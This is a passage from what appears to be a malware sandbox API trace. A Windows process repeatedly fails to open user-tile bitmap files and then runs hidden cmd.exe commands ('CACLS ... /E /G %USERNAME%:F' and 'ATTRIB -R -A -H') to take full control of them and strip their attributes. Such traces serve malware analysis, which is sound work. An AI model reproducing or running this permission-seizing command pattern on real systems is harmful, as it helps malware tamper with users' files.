dwMilliseconds=0xffffffff) returned 0x0 [0180.068] CloseHandle (hObject=0x1b4) returned 1 [0180.068] CloseHandle (hObject=0x120) returned 1 [0180.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] ReleaseMutex (hMutex=0xf8) returned 1 [0180.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] ReleaseMutex (hMutex=0xf8) returned 1 [0180.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] ReleaseMutex (hMutex=0xf8) returned 1 [0180.068] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.068] ReleaseMutex (hMutex=0xf8) returned 1 [0180.068] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.068] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", lpFilePart=0x12eab4*="usertile12.bmp") returned 0x52 [0180.068] GetLastError () returned 0x5 [0180.068] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0180.068] LocalFree (hMem=0x1c6cc8) returned 0x0 [0180.068] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0180.068] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0180.069] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.069] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.069] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0180.069] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0180.069] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0180.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.069] ReleaseMutex (hMutex=0xf8) returned 1 [0180.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.069] ReleaseMutex (hMutex=0xf8) returned 1 [0180.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.069] ReleaseMutex (hMutex=0xf8) returned 1 [0180.069] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.069] ReleaseMutex (hMutex=0xf8) returned 1 [0180.069] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.069] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", lpFilePart=0x12eab4*="usertile13.bmp") returned 0x52 [0180.069] GetLastError () returned 0x5 [0180.069] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0180.069] LocalFree (hMem=0x1c6cc8) returned 0x0 [0180.069] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0180.070] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0180.070] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.070] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.070] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0180.070] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0180.070] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcf8, dwThreadId=0x170)) returned 1 [0180.071] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] CloseHandle (hObject=0x1b4) returned 1 [0180.515] CloseHandle (hObject=0x120) returned 1 [0180.515] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] ReleaseMutex (hMutex=0xf8) returned 1 [0180.515] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] ReleaseMutex (hMutex=0xf8) returned 1 [0180.515] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] ReleaseMutex (hMutex=0xf8) returned 1 [0180.515] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.515] ReleaseMutex (hMutex=0xf8) returned 1 [0180.515] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.515] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", lpFilePart=0x12eab4*="usertile13.bmp") returned 0x52 [0180.516] GetLastError () returned 0x5 [0180.516] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0180.516] LocalFree (hMem=0x1c6cc8) returned 0x0 [0180.516] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0180.516] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0180.516] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.516] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.516] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0180.516] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0180.516] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0180.516] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.516] ReleaseMutex (hMutex=0xf8) returned 1 [0180.516] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.516] ReleaseMutex (hMutex=0xf8) returned 1 [0180.516] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.516] ReleaseMutex (hMutex=0xf8) returned 1 [0180.516] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0180.517] ReleaseMutex (hMutex=0xf8) returned 1 [0180.517] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.517] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", lpFilePart=0x12eab4*="usertile14.bmp") returned 0x52 [0180.517] GetLastError () returned 0x5 [0180.517] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0180.517] LocalFree (hMem=0x1c6cc8) returned 0x0 [0180.517] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0180.517] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0180.517] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.517] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0180.517] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0180.517] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0180.517] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcfc, dwThreadId=0x46c)) returned 1 [0180.519] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] CloseHandle (hObject=0x1b4) returned 1 [0181.887] CloseHandle (hObject=0x120) returned 1 [0181.887] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] ReleaseMutex (hMutex=0xf8) returned 1 [0181.887] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] ReleaseMutex (hMutex=0xf8) returned 1 [0181.887] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] ReleaseMutex (hMutex=0xf8) returned 1 [0181.887] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.887] ReleaseMutex (hMutex=0xf8) returned 1 [0181.888] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.888] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", lpFilePart=0x12eab4*="usertile14.bmp") returned 0x52 [0181.888] GetLastError () returned 0x5 [0181.888] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0181.888] LocalFree (hMem=0x1c6cc8) returned 0x0 [0181.888] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0181.888] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0181.888] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0181.888] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0181.888] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0181.888] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0181.888] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0181.888] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.888] ReleaseMutex (hMutex=0xf8) returned 1 [0181.888] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.888] ReleaseMutex (hMutex=0xf8) returned 1 [0181.888] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.888] ReleaseMutex (hMutex=0xf8) returned 1 [0181.888] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0181.888] ReleaseMutex (hMutex=0xf8) returned 1 [0181.889] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.913] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", lpFilePart=0x12eab4*="usertile15.bmp") returned 0x52 [0181.913] GetLastError () returned 0x5 [0181.913] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0181.913] LocalFree (hMem=0x1c6cc8) returned 0x0 [0181.913] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0181.913] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0181.914] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0181.914] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0181.914] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0181.914] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0181.914] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbf4, dwThreadId=0xbec)) returned 1 [0181.916] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] CloseHandle (hObject=0x1b4) returned 1 [0182.269] CloseHandle (hObject=0x120) returned 1 [0182.269] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] ReleaseMutex (hMutex=0xf8) returned 1 [0182.269] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] ReleaseMutex (hMutex=0xf8) returned 1 [0182.269] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] ReleaseMutex (hMutex=0xf8) returned 1 [0182.269] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.269] ReleaseMutex (hMutex=0xf8) returned 1 [0182.269] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.269] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", lpFilePart=0x12eab4*="usertile15.bmp") returned 0x52 [0182.269] GetLastError () returned 0x5 [0182.269] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0182.270] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.270] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.270] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.270] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.270] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.270] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.270] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.270] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0182.270] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.270] ReleaseMutex (hMutex=0xf8) returned 1 [0182.270] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.270] ReleaseMutex (hMutex=0xf8) returned 1 [0182.270] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.270] ReleaseMutex (hMutex=0xf8) returned 1 [0182.270] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.270] ReleaseMutex (hMutex=0xf8) returned 1 [0182.270] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.271] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", lpFilePart=0x12eab4*="usertile16.bmp") returned 0x52 [0182.271] GetLastError () returned 0x5 [0182.271] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0182.271] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.271] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.271] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.271] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.271] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.271] 